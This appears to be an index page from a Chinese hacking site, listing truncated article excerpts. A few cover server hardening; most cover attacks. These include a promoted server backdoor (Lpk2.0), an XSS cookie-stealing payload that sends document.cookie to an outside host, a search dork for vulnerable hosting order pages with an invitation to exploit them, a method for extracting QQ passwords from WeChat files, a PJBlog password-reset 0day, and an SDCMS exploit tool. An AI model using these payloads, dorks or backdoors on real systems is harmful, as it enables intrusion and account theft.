关于Nginx+PHP的虚拟主机目录权限控制的探究
Nginx的使用者最近越来越多,很多大型网站也都从Apache或其他平台迁移到了Nginx。但在我使用Nginx的过程中有个问题一直未得到解决,就是如何限制Nginx+PHP的目录权限 我们知道,在Apache中可以很容易的对虚拟目录进行权限控制,如: <VirtualHost www.xpb.cn> ServerAdmin xiaopb@live.com DocumentRoot /...
nginx+fastcgi+php安全虚拟主机隔离配制方法
网上关于nginx +fastcgi+php 虚拟主机独立站点安全配置文章很多。 其中 关于Nginx+PHP的虚拟主机目录权限控制的探究 文章已经讲的很详细了。方法很多,有设置http://www.cnblogs.com/http://www.cnblogs.com/ 特殊目录的,有通过open_basedir配制独立站点,独立目录的。 还有将所有站点目录都写在open_basedir里面。只是...
Setch Lpk2.0超强后门
直接介绍什么是Lpk:是Rices神牛写的一款服务器后门。功能异常强悍。 强悍之处:把生成出来的LPK放到可执行文件的目录中(比如IE SU ...)一些常用的软件目录里。只要管理员一运行就会调用LPK 使用教程:http://rices.so/lpk2.html 只要粘滞键为可用状态,可以保证100%劫持!完全兼容(2K/2K3/XP/08/VISTA/WIN7).. 其次吸取了一些人的建议,觉...
星外订单提交处过滤不严导致XSS
google or baidu 搜索 inurl:user/order.asp?type=虚拟主机 暂时只会XSS偷取cookie 可以加帐号 可以后台挂马 等等等等 自己利用吧。 XXS 偷取cookie代码 <script>document.write('<img src="https://www.webshell.cc/news.asp?msg='+document.cook...
入侵泰国女总理微博帐号的黑客被捕
泰国信息和通讯技术部长阿努滴·那空他5日说,非法侵入总理英拉·西那瓦微博客的一名 “黑客”遭拘捕,可能面临两年监禁。 大学生阿加维·通迪沃拉昆现年22岁,受到执法人员调查后自首。他供认,自己本月2 日盗取英拉的微博客账号,发布8条微博,批评英拉的施政纲领,指责她应对洪灾不力。 其中一条微博写道:“想想吧,如果她连自己的微博账户都保护不了,她怎么能保护国家?” 英拉随后回应,称“黑客”行为是对“公民...
利用.htaccess 设置密码访问目录
在要设置访问权限的目录加入.htaccess 并写入如下内容 AuthName "Section Name" AuthType Basic www.webshell.cc AuthUserFile D:/www/.htpasswd Require valid-user ----------------------------分割线----------------------------------...
QQ微信暴QQ密码登陆信息
QQ微信暴QQ密码。。。先扯蛋下。。由于昨天才从长沙回。。今天回到家,就一个字爽。。所以今天心情非常的好。。就说一下上个星期发现微信可以暴QQ密码。。由于买了个手机。所以蛋疼的下了个微信。。结果玩着玩着。。发现了oday。。下面开始说说怎么搞吧。。。 第一:首先用数据线连接到你手机上。然后打开你的e盘。。就是你安装微信在那个盘里。。我是安装在e盘。 第二 :在e盘找到MM文件夹。(这个MM是微信安...
PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码0day
PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术 在文件Action.asp中: ElseIf Request.QueryString(“action”) = “updatepassto” Then //第307行 If ChkPost() Then Dim e_Pass, e_RePass, e_...
SDCMS 通杀漏洞利用工具
上图上工具: 图一 图二 图三 这种情况不知道什么原因 重新输入一遍又可以进入后台了! 图四 这样直接进入后台了。。。。 是不是很傻瓜 关键词:Powered By SDCMS 利用环境:windows xp 下载:sdcms1.3
SDCMS通杀漏洞
作者:T00LS 鬼哥 漏洞文件:后台目录/index.asp 作者声明:转载请注明 T00ls 鬼哥 Sub Check Dim username,password,code,getcode,Rs IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub username=FilterText(Trim(Request.Form("username")),1)...